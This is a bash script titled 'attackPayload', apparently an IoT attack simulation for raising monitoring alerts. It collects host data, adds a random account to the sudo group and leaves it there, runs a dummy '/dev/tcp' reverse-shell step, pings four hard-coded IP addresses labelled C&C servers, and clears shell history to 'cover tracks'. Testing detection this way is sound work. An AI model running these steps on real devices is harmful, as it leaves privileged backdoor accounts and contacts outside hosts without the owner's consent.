IoTSecurity

attackPayload

Oct 23rd, 2019
  1. #!/bin/bash
  2. # Running from within the attacked device
  3.  
  # Command-line defaults. INTERACTIVE stays "true" unless the
  # -ni/--non-interactive switch is given; interactiveCheckpoint reads it to
  # decide whether to wait for Enter between stages.
  INTERACTIVE="true"
  6.  
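  #######################################
  # Pause until the operator presses Enter, but only in interactive mode.
  # Globals:   INTERACTIVE (read) - the pause happens only when it is "true"
  # Outputs:   the prompt line on stdout
  # Returns:   the status of read when a pause happened, otherwise 0
  #######################################
  function interactiveCheckpoint {
    if [ "$INTERACTIVE" = true ]; then
      echo "Press [Enter] to continue attack"
      # -r stops a trailing backslash from joining the next input line to this
      # one; whatever was typed is thrown away.
      read -r _
    fi
  }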
  14.  
  15.  
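  # Print one progress line: current UTC time, a space, then the message.
  function attackLog {
    printf '%s %s\n' "$(date -u)" "$1"
  }

  #######################################
  # Run the four stages of the script in order: host information, account
  # creation, the "CnC" stage, and the history step. The section notes kept
  # from the original read like the names of the alerts each stage is meant to
  # raise - NOTE(review): confirm against the monitoring product in use.
  # Globals:   none written (the account name is kept local)
  # Outputs:   progress on stdout, a failure line on stderr, and the ping
  #            output in ./pingtoCnC.txt
  # Side effects: leaves a new account in the sudo group on the device.
  #######################################
  function attack {
    local simUser banner addStatus=0

    # Original section note: "Local host reconnaissance detected"
    echo "###################################################################"
    echo " Getting device information "
    echo "###################################################################"
    attackLog " Conducting analysis of host data..."
    uname -a -v -n
    attackLog " Got host data"

    # Original section note: "Detected suspicious use of the useradd command"
    echo "###################################################################"
    echo " Create User and Escalate Privilege "
    echo "###################################################################"

    # Kept in a local name: assigning to USER would overwrite the login
    # environment variable that every later child process inherits.
    simUser="privilegeduser${RANDOM}"

    attackLog " Adding user named ${simUser} with privilege root to the system..."
    # Both commands are always run, as before; only the report depends on
    # their result. useradd is called without sudo, so it fails when the
    # script is not started as root.
    # NOTE(review): nothing here removes the account again. After the alert
    # has been checked, delete it (userdel) so no sudo-group account is left
    # on the device.
    useradd "$simUser" || addStatus=1
    sudo usermod -aG sudo "$simUser" || addStatus=1
    if [ "$addStatus" -eq 0 ]; then
      attackLog " Successfully added user named ${simUser} with privilege root to the system"
    else
      # Do not report success for a step that failed; a false "success" line
      # makes a missing alert look like a detection gap.
      attackLog " Failed to add user named ${simUser} to the system" >&2
    fi

    # toilet is optional: fall back to plain text when it is not installed.
    # printf '%s' prints the banner as-is, so backslashes in the rendered font
    # are not interpreted.
    if command -v toilet > /dev/null 2>&1; then
      banner=$(toilet -f pagga "C&C Connected")
    else
      banner="C&C Connected"
    fi
    printf '\e[01;32m%s\e[00m\n' "$banner"
    interactiveCheckpoint

    # Original section note: "Reverse shells, Suspicious IP address communication"
    echo "###################################################################"
    echo " Communicating with CnC for getting attack commands "
    echo "###################################################################"

    attackLog " Opening reverse shell..."
    # No host or port follows /dev/tcp/, so no connection is made: bash is
    # asked to run that path as a script, fails, and the error is discarded.
    # The "established" line below is printed regardless of the result.
    bash /dev/tcp/ 2> /dev/null
    attackLog " Reverse shell established"

    attackLog " Communicating with CnC server..."
    # One echo request per address. The four pings share one redirection so
    # the file keeps every result; separate ">" redirections kept only the
    # last one.
    {
      ping -c1 209.17.96.18
      ping -c1 209.17.96.106
      ping -c1 209.17.96.234
      ping -c1 106.51.80.198
    } > pingtoCnC.txt

    attackLog " Listening to CnC for future attack commands..."

    # Original section note: "Removal of system logs files detected"
    echo "###################################################################"
    echo " Covering Tracks - Deleting Logs and Executables "
    echo "###################################################################"

    attackLog " Deleting history files..."
    # history -c clears the in-memory history list of this shell only; no
    # history file or log file on disk is touched by this step.
    history -c
    attackLog " Deleted history files"
  }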
  67.  
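  # Print the supported switches. The -h branch called usage, but no such
  # function is defined in the script, so help ended in "command not found".
  function usage {
    echo "Usage: ${0##*/} [-ni|--non-interactive] [-h|--help]"
  }

  #######################################
  # Read the command line.
  # Globals:   INTERACTIVE (written), POSITIONAL (written)
  # Arguments: the script's own arguments
  # Returns:   0; exits 0 after printing help for -h/--help
  #######################################
  function parseArgs {
    POSITIONAL=()
    while [[ $# -gt 0 ]]; do
      case "$1" in
        -ni|--non-interactive)
          INTERACTIVE=false
          # The switch takes no value, so only the switch itself is consumed;
          # a second shift here dropped whatever argument followed it.
          shift
          ;;
        -h|--help)
          # Help exits before any stage runs.
          usage
          exit 0
          ;;
        *)
          # Unknown word: keep it for later.
          POSITIONAL+=("$1")
          shift
          ;;
      esac
    done
  }

  parseArgs "$@"
  set -- "${POSITIONAL[@]}" # restore positional parameters

  attack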